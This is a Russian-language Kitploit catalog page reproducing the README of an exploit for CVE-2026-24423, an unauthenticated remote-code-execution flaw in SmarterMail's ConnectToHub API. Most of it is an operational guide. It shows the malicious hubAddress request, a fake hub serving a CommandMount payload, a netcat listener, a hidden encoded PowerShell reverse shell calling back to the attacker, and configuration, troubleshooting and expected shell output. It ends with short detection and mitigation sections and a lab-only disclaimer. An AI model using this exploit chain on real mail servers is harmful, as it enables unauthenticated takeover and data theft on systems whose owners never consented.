Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
SmarterMail-CVE-2026-24423- — Эксплойт для CVE-2026-24423 — критическая неаутентифицированная RCE в API ConnectToHub продукта SmarterMail. Затрагивает все сборки до 9511. | Kitploit
Инструменты/GitHubGitHub/cyberalp0/smartermail-cve-2026-24423-
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingИнструмент Удаленного Доступа
GitHubcyberalp0/smartermail-cve-2026-24423-

SmarterMail-CVE-2026-24423-

Эксплойт для CVE-2026-24423 — критическая неаутентифицированная RCE в API ConnectToHub продукта SmarterMail. Затрагивает все сборки до 9511.

Репозиторий
14 ч 49 мин назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

SmarterMail ConnectToHub RCE

Python-эксплойт для CVE-2026-24423 — неаутентифицированной уязвимости удалённого выполнения кода в функциональности ConnectToHub продукта SmarterTools SmarterMail.

Предназначение: Только авторизованное тестирование безопасности, CTF, лаборатории Hack The Box и контролируемые исследовательские среды.


Содержание

  • Обзор
  • Детали CVE
  • Затронутые версии
  • Описание уязвимости
  • Технические детали
  • Схема эксплуатации
  • Требования
  • Конфигурация
  • Использование
  • Ожидаемый результат
  • Устранение неполадок
Скриншоты
  • Структура проекта
  • Обнаружение
  • Смягчение
  • Ссылки
  • Отказ от ответственности

  • Обзор

    CVE-2026-24423 — это неаутентифицированная уязвимость удалённого выполнения кода, затрагивающая SmarterTools SmarterMail.

    Уязвимость существует в функциональности ConnectToHub. Неаутентифицированный злоумышленник может указать вредоносный hubAddress, в результате чего сервер SmarterMail выполнит HTTP-запрос к серверу, контролируемому злоумышленником.

    Вредоносный сервер отвечает сформированным ответом setup-initial-connection, содержащим контролируемое значение SystemMount.CommandMount.

    Уязвимый экземпляр SmarterMail впоследствии обрабатывает это значение как команду операционной системы, что позволяет выполнять произвольные команды в контексте безопасности службы SmarterMail.

    Уязвимости присвоен показатель CVSS 4.0 — 9.3 (критический), и она классифицирована как CWE-306: Отсутствие аутентификации для критической функции.


    Детали CVE

    ПолеЗначение
    CVECVE-2026-24423
    ПроизводительSmarterTools
    ПродуктSmarterMail
    УязвимостьНеаутентифицированное удалённое выполнение кода
    CWECWE-306
    CVSS v4.09.3 Критический
    CVSS v3.19.8 Критический
    Вектор атакиСеть
    АутентификацияНе требуется
    Взаимодействие с пользователемНе требуется
    СложностьНизкая
    Опубликовано23 января 2026 г.
    Исправленная сборка9511

    Официальная запись CVE описывает проблему как неаутентифицированное RCE через метод API ConnectToHub.


    Затронутые версии

    Уязвимы версии SmarterMail до Build 9511.

    Запись CVE определяет затронутый диапазон как:

    root@kitploit:~
    SmarterMail < 100.0.9511
    

    Сборка 9511, выпущенная 15 января 2026 г., содержит исправление производителя.

    Уязвимые

    root@kitploit:~
    < 100.0.9511
    

    Исправленные

    root@kitploit:~
    >= 100.0.9511
    

    Всегда проверяйте точную установленную сборку перед попыткой воспроизведения уязвимости.


    Описание уязвимости

    Уязвимая функциональность доступна через API системного администрирования SmarterMail.

    Соответствующая операция:

    root@kitploit:~
    /api/v1/settings/sysadmin/connect-to-hub
    

    Конечная точка принимает параметр hubAddress.

    Концептуально злоумышленник может указать:

    root@kitploit:~
    {
        "hubAddress": "http://ATTACKER_IP:8081",
        "oneTimePassword": "temporary-value",
        "nodeName": "DC"
    }
    

    Затем SmarterMail подключается к указанному адресу хаба и запрашивает:

    root@kitploit:~
    /web/api/node-management/setup-initial-connection
    

    Сервер, контролируемый злоумышленником, отвечает JSON, содержащим вредоносный объект SystemMount.

    Важное свойство:

    root@kitploit:~
    "SystemMount": {
        "Enabled": true,
        "ReadOnly": false,
        "MountPath": "...",
        "CommandMount": "..."
    }
    

    Значение CommandMount впоследствии используется уязвимым приложением как команда операционной системы.

    Это позволяет злоумышленнику перейти от:

    root@kitploit:~
    Неаутентифицированный HTTP-запрос
    

    к:

    root@kitploit:~
    Удалённое выполнение команд
    

    Технический анализ VulnCheck подтверждает, что контролируемый злоумышленником hubAddress заставляет SmarterMail запрашивать конечную точку setup-initial-connection злоумышленника, а возвращаемый CommandMount может обеспечить произвольное выполнение команд.


    Технические детали

    Эксплойт состоит из двух компонентов:

    1. Поддельный хаб SmarterMail

    Python-сервер прослушивает:

    root@kitploit:~
    POST /web/api/node-management/setup-initial-connection
    

    и возвращает сформированный JSON-ответ, содержащий вредоносный SystemMount.CommandMount.

    2. Слушатель обратной оболочки

    Отдельный TCP-слушатель принимает соединение, инициированное командой, выполненной на цели.

    Этот эксплойт намеренно использует два отдельных порта.

    root@kitploit:~
    8081
    └── Поддельный хаб SmarterMail
    
    4455
    └── Слушатель обратной оболочки
    

    Схема эксплуатации

    root@kitploit:~
    flowchart LR
    
        A[Злоумышленник<br/>10.10.14.50]
    
        H[Поддельный хаб SmarterMail<br/>TCP/8081]
    
        T[Цель SmarterMail<br/>10.129.57.86]
    
        C[CommandMount<br/>Выполнение команд]
    
        P[PowerShell]
    
        L[Слушатель обратной оболочки<br/>TCP/4455]
    
        A -->|Запуск ConnectToHub| T
        T -->|HTTP POST| H
        H -->|Вредоносный JSON| T
        T -->|CommandMount| C
        C --> P
        P -->|Обратный TCP| L
        L --> A

    Соединение 1 — Поддельный хаб

    root@kitploit:~
    Цель
       |
       | HTTP
       v
    10.10.14.50:8081
    

    Соединение 2 — Обратная оболочка

    root@kitploit:~
    Цель
       |
       | TCP
       v
    10.10.14.50:4455
    

    Эти порты служат разным целям, и их не следует путать.


    Требования

    • Python 3
    • Атакующая машина на Linux
    • VPN Hack The Box или эквивалентная авторизованная сеть
    • Сетевая доступность от цели до атакующего
    • Netcat
    • Уязвимая установка SmarterMail

    Эксплойт использует только модули стандартной библиотеки Python:

    root@kitploit:~
    http.server
    json
    base64
    

    Внешние Python-пакеты не требуются.


    Конфигурация

    Отредактируйте следующие переменные:

    root@kitploit:~
    LHOST = "10.10.14.50"
    LPORT = 4455
    HUB_PORT = 8081
    

    Для примера среды HTB:

    root@kitploit:~
    LHOST     = 10.10.14.50
    LPORT     = 4455
    HUB_PORT  = 8081
    

    LHOST

    LHOST — это IP-адрес атакующего, доступный для цели.

    Для Hack The Box это обычно IP-адрес, назначенный VPN-интерфейсу HTB:

    root@kitploit:~
    ip addr show tun0
    

    Пример:

    root@kitploit:~
    tun0:
        inet 10.10.14.50
    

    Следовательно:

    root@kitploit:~
    LHOST = "10.10.14.50"
    

    LPORT

    LPORT — это TCP-порт, используемый атакующим для приёма обратного соединения.

    Пример:

    root@kitploit:~
    LPORT = 4455
    

    HUB_PORT

    HUB_PORT — это HTTP-порт, используемый вредоносным хабом SmarterMail.

    Пример:

    root@kitploit:~
    HUB_PORT = 8081
    

    Использование

    1. Клонирование репозитория

    root@kitploit:~
    git clone https://github.com/<username>/<repository>.git
    cd <repository>
    

    2. Настройка эксплойта

    Отредактируйте:

    root@kitploit:~
    nano exploit.py
    

    Установите:

    root@kitploit:~
    LHOST = "10.10.14.50"
    LPORT = 4455
    HUB_PORT = 8081
    

    3. Запуск слушателя обратной оболочки

    Откройте терминал:

    root@kitploit:~
    nc -lvnp 4455
    

    Ожидаемый результат:

    root@kitploit:~
    Listening on 0.0.0.0 4455
    

    Держите этот терминал открытым.


    4. Запуск вредоносного хаба

    Откройте второй терминал:

    root@kitploit:~
    python3 exploit.py
    

    Если для привязки к выбранному порту требуются повышенные привилегии:

    root@kitploit:~
    sudo python3 exploit.py
    

    Ожидаемый результат:

    root@kitploit:~
    ============================================================
     SmarterMail fake hub
    ============================================================
    [+] LHOST:      10.10.14.50
    [+] LPORT:      4455
    [+] HUB:        10.10.14.50:8081
    
    [+] Waiting for SmarterMail...
    ============================================================
    

    5. Запуск ConnectToHub

    Отправьте соответствующий запрос на уязвимый экземпляр SmarterMail.

    Указанный hubAddress должен указывать на вредоносный HTTP-сервер:

    root@kitploit:~
    {
        "hubAddress": "http://10.10.14.50:8081",
        "oneTimePassword": "tempst",
        "nodeName": "DC"
    }
    

    Важное значение:

    root@kitploit:~
    http://10.10.14.50:8081
    

    Не используйте порт обратной оболочки в качестве порта хаба.


    Сводка конфигурации портов

    НазначениеIPПорт
    VPN атакующего10.10.14.50—
    Поддельный хаб SmarterMail10.10.14.508081
    Обратная оболочка10.10.14.504455
    Цель HTB10.129.57.86—

    Результирующий поток:

    root@kitploit:~
    hubAddress
        ↓
    10.10.14.50:8081
        ↓
    Вредоносный CommandMount
        ↓
    PowerShell
        ↓
    10.10.14.50:4455
    

    Кодирование полезной нагрузки

    Эксплойт динамически создаёт полезную нагрузку PowerShell.

    Параметр -EncodedCommand в PowerShell ожидает, что команда будет закодирована в UTF-16LE перед кодированием Base64.

    Скрипт выполняет:

    root@kitploit:~
    encoded = base64.b64encode(
        PS.encode("utf-16le")
    ).decode()
    

    Итоговая команда имеет структуру:

    root@kitploit:~
    powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -EncodedCommand <BASE64>
    

    Это позволяет избежать ручного кодирования полезной нагрузки и предотвращает типичные ошибки кодирования UTF-8/UTF-16LE.


    Ожидаемый результат

    Когда цель обращается к вредоносному хабу:

    root@kitploit:~
    [+] Received SmarterMail connection
    [+] Path: /web/api/node-management/setup-initial-connection
    [+] Body: ...
    [+] Sending CommandMount payload
    [+] Reverse shell -> 10.10.14.50:4455
    

    Слушатель обратной оболочки должен впоследствии получить соединение:

    root@kitploit:~
    Connection received on 10.129.57.86 XXXXX
    

    После подключения можно выполнить базовую проверку:

    root@kitploit:~
    whoami
    
    root@kitploit:~
    hostname
    

    Устранение неполадок

    Поддельный хаб не получает соединение

    Проверьте, что сервер прослушивает порт:

    root@kitploit:~
    ss -lntp | grep 8081
    

    Проверьте VPN-адрес:

    root@kitploit:~
    ip addr show tun0
    

    Убедитесь, что LHOST соответствует адресу, доступному с цели.


    Поддельный хаб получает HTTP 200, но оболочки нет

    Успешный HTTP-запрос означает, что первый этап работает:

    root@kitploit:~
    Цель
      |
      | HTTP
      v
    Поддельный хаб :8081
    

    Это не обязательно означает, что второй этап прошёл успешно.

    Проверьте:

    root@kitploit:~
    ss -lntp | grep 4455
    

    Убедитесь, что Netcat был запущен до запуска эксплойта.

    Также проверьте:

    root@kitploit:~
    LHOST = доступный для цели IP атакующего
    LPORT = порт слушателя
    

    Netcat получает HTTP-запрос вместо оболочки

    Если вы видите:

    root@kitploit:~
    POST /web/api/node-management/setup-initial-connection
    

    внутри Netcat, значит, вы указали hubAddress на слушатель обратной оболочки.

    Неправильно:

    root@kitploit:~
    hubAddress = http://10.10.14.50:4455
    

    Правильно:

    root@kitploit:~
    hubAddress = http://10.10.14.50:8081
    

    Два порта должны оставаться раздельными.


    Ответ HTTP 400

    Ответ 400 может возникнуть, когда поддельный хаб не возвращает структуру, ожидаемую SmarterMail.

    Убедитесь, что ответ содержит:

    root@kitploit:~
    "SystemMount": {
        "Enabled": true,
        "ReadOnly": false,
        "MountPath": "...",
        "CommandMount": "..."
    }
    

    Также убедитесь, что запрашиваемый путь точно такой:

    root@kitploit:~
    /web/api/node-management/setup-initial-connection
    

    Публичный анализ уязвимости идентифицирует эту конечную точку как часть уязвимого потока ConnectToHub.


    Скриншоты

    Добавьте сюда скриншоты из лаборатории HTB.

    1. Разведка цели

    Пример:

    root@kitploit:~
    ![Nmap Enumeration](https://raw.githubusercontent.com/cyberalp0/smartermail-cve-2026-24423-/HEAD/screenshots/nmap.png)
    

    Рекомендуемые скриншоты:

    • Результаты Nmap
    • Служба/версия SmarterMail
    • Соответствующий открытый порт

    2. Вредоносный хаб

    root@kitploit:~
    ![Fake Hub](https://raw.githubusercontent.com/cyberalp0/smartermail-cve-2026-24423-/HEAD/screenshots/fake-hub.png)
    

    Покажите:

    root@kitploit:~
    [+] Received SmarterMail connection
    [+] Sending CommandMount payload
    

    3. Запуск эксплойта

    root@kitploit:~
    ![Burp Request](https://raw.githubusercontent.com/cyberalp0/smartermail-cve-2026-24423-/HEAD/screenshots/burp-request.png)
    

    Покажите запрос, содержащий:

    root@kitploit:~
    {
        "hubAddress": "http://10.10.14.50:8081"
    }
    

    4. Обратная оболочка

    root@kitploit:~
    ![Reverse Shell](https://raw.githubusercontent.com/cyberalp0/smartermail-cve-2026-24423-/HEAD/screenshots/reverse-shell.png)
    

    Покажите:

    root@kitploit:~
    Connection received on 10.129.57.86
    

    и результирующее приглашение командной строки.


    Структура проекта

    root@kitploit:~
    smartermail-rce/
    │
    ├── exploit.py
    ├── README.md
    │
    └── screenshots/
        ├── nmap.png
        ├── burp-request.png
        ├── fake-hub.png
        └── reverse-shell.png
    

    Обнаружение

    Возможные индикаторы эксплуатации включают неожиданные запросы к:

    root@kitploit:~
    /api/v1/settings/sysadmin/connect-to-hub
    

    и исходящие соединения от сервера SmarterMail к ранее неизвестным HTTP-хостам.

    Администраторам также следует проверять журналы приложения, IIS/обратного прокси и сетевые журналы на предмет подозрительной активности ConnectToHub.

    CVE-2026-24423 включён в каталог Known Exploited Vulnerabilities CISA, что указывает на то, что эксплуатация наблюдалась за пределами лабораторных сред.


    Смягчение

    Основное средство устранения — обновление SmarterMail до Build 9511 или новее. Релиз производителя от 15 января 2026 г. устранил уязвимость.

    Если немедленное исправление невозможно, организациям следует дополнительно рассмотреть:

    • Ограничение доступа к административным API SmarterMail.
    • Предотвращение ненужного внешнего доступа к конечным точкам управления.
    • Применение сетевой сегментации.
    • Мониторинг исходящих соединений от сервера SmarterMail.
    • Проверку исторических журналов на предмет подозрительных запросов ConnectToHub.
    • Расследование неожиданного выполнения команд учётной записью службы SmarterMail.

    Ссылки

    • Запись CVE: CVE-2026-24423
    • VulnCheck: SmarterMail ConnectToHub Unauthenticated RCE
    • CODE WHITE: Публичный список уязвимостей
    • Примечания к выпуску SmarterTools SmarterMail
    • Каталог Known Exploited Vulnerabilities CISA

    Отказ от ответственности

    Этот проект предоставляется только для авторизованных исследований в области безопасности и образовательных целей.

    Не используйте этот эксплойт против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.

    Автор не несёт ответственности за неправомерное использование, ущерб, потерю данных, несанкционированный доступ или иные последствия, возникшие в результате использования данного программного обеспечения.

    Используйте только в контролируемых средах, таких как:

    • Hack The Box
    • Соревнования Capture-the-Flag
    • Личные лаборатории
    • Авторизованные тесты на проникновение
    • Среды исследований в области безопасности

    Авторы

    CVE-2026-24423 была приписана:

    • Sina Kheirkhah
    • Piotr Bazydlo
    • Markus Wulftange
    • Cale Black

    CVE была опубликована VulnCheck 23 января 2026 г.

    Скачать инструмент